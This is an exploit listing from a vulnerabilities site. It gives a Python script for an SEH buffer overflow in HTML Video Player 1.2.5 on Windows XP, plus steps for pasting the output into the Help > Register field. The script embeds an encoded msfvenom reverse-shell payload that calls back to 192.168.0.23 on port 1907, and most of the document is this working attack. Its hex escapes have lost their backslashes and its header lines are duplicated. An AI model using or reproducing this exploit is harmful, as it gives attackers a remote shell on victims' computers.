Category: Vulnerabilities
Hits: 332
# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
# Author: Kagan Capar
# Discovery Date: 2018-11-16
# Software Link: http://www.html5videoplayer.net/html5videoplayer-set # Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
# Author: Kagan Capar
# Discovery Date: 2018-11-16
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Vendor Homepage : http://www.html5videoplayer.net
# Tested Version: 1.2.5
# Tested on OS: Windows XP SP3 *ENG
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" and copy content to clipboard
# Open software, click Help > Register and paste "Username" click "OK"
# Finally, Connect victim machine on port your localport "1907"

#!/usr/bin/python
import struct

#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=41414141
#=> next_handler below!
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=336F4332 =>

#7C901931 5E POP ESI
#7C901932 5B POP EBX
#7C901933 C3 RETN

#Executable modules, item 14
#Base=7C900000
#Size=000B2000 (729088.)
#Entry=7C912AFC ntdll.<ModuleEntryPoint>
#Name=ntdll (system)
#File version=5.1.2600.6055 (xpsp_sp3_qfe.101
#Path=C:WINDOWSsystem32 tdll.dll

file = open("exploit.txt", "w")
buf = "x43x57x44x4Fx4Ex4Bx4Ex50x48x52x4Bx45x59x41x4bx53" * 124
buf+= "xEBx06x90x90" #6b jmp code
buf+= struct.pack('<I', 0x7C901931)

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "x00x0ax0dx1a"
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
#Final size of py file: 1684 bytes

buf += "xbexabxfdx5fx95xdaxcbxd9x74x24xf4x5fx29"
buf += "xc9xb1x52x83xefxfcx31x77x0ex03xdcxf3xbd"
buf += "x60xdexe4xc0x8bx1exf5xa4x02xfbxc4xe4x71"
buf += "x88x77xd5xf2xdcx7bx9ex57xf4x08xd2x7fxfb"
buf += "xb9x59xa6x32x39xf1x9ax55xb9x08xcfxb5x80"
buf += "xc2x02xb4xc5x3fxeexe4x9ex34x5dx18xaax01"
buf += "x5ex93xe0x84xe6x40xb0xa7xc7xd7xcaxf1xc7"
buf += "xd6x1fx8ax41xc0x7cxb7x18x7bxb6x43x9bxad"
buf += "x86xacx30x90x26x5fx48xd5x81x80x3fx2fxf2"
buf += "x3dx38xf4x88x99xcdxeex2bx69x75xcaxcaxbe"
buf += "xe0x99xc1x0bx66xc5xc5x8axabx7exf1x07x4a"
buf += "x50x73x53x69x74xdfx07x10x2dx85xe6x2dx2d"
buf += "x66x56x88x26x8bx83xa1x65xc4x60x88x95x14"
buf += "xefx9bxe6x26xb0x37x60x0bx39x9ex77x6cx10"
buf += "x66xe7x93x9bx97x2ex50xcfxc7x58x71x70x8c"
buf += "x98x7exa5x03xc8xd0x16xe4xb8x90xc6x8cxd2"
buf += "x1ex38xacxddxf4x51x47x24x9fx9dx30x26x48"
buf += "x76x43x26x71xf5xcaxc0x17xe9x9ax5bx80x90"
buf += "x86x17x31x5cx1dx52x71xd6x92xa3x3cx1fxde"
buf += "xb7xa9xefx95xe5x7cxefx03x81xe3x62xc8x51"
buf += "x6dx9fx47x06x3ax51x9exc2xd6xc8x08xf0x2a"
buf += "x8cx73xb0xf0x6dx7dx39x74xc9x59x29x40xd2"
buf += "xe5x1dx1cx85xb3xcbxdax7fx72xa5xb4x2cxdc"
buf += "x21x40x1fxdfx37x4dx4axa9xd7xfcx23xecxe8"
buf += "x31xa4xf8x91x2fx54x06x48xf4x74xe5x58x01"
buf += "x1dxb0x09xa8x40x43xe4xefx7cxc0x0cx90x7a"
buf += "xd8x65x95xc7x5ex96xe7x58x0bx98x54x58x1e"
buf += "x90" * (4000 - len(buf))

print len(buf)
file.write(buf)
file.close()